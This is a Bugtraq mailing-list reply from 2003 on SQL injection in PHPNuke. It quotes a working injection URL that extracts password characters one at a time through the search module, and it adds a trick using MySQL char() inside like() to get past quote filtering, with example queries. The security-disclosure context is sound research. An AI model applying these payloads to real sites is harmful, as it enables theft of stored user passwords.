Bugtraq mailing list archives

Re: PHPNuke SQL Injection

From: Martin Eiszner <martin () websec org>
Date: Fri, 21 Feb 2003 08:11:18 +0100


hola,

On 20 Feb 2003 20:36:11 -0000
Lucas Armstrong <lucas () cgishield com> wrote:

To get around this problem, one could use the mysql char() 
function which will output any ascii value, without using quotes. So to 
guess the letter 'a' the hacker could use char(97). Here is an example url 
guessing the 3rd character in the pwd column as 'a':
http://site/modules.php?
name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,3,1)=char
(97)&type=stories


JFYI:

this maybe off topic but it worth mentioning .. a couple of month ago we found out 
that the mysql char() function can be used within the "like() - function" to place 
quotes.

this may help somebody doing sql-injection in an "quote-stripped :-)" environment.

example query:
---*---
select id,Name,password from Users where id = 1 and (user() like "%root%");
---*---

and now "without" quotes:
---*---
select id,Name,password from Users where id = 1 and (user() like char(37,114,111,111,116,37));
---*---


...


nice day,


mEi





 

-- 
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE

mei () websec org
http://www.websec.org
tel: 0043 699 121772 37

Current thread:

PHPNuke SQL Injection Lucas Armstrong (Feb 20)
- Re: PHPNuke SQL Injection Martin Eiszner (Feb 21)
- Re: PHPNuke SQL Injection / General SQL Injection David Walker (Feb 21)
  - Re: PHPNuke SQL Injection / General SQL Injection MightyE (Feb 23)
- <Possible follow-ups>
- RE: PHPNuke SQL Injection Oriol Carreas (Feb 21)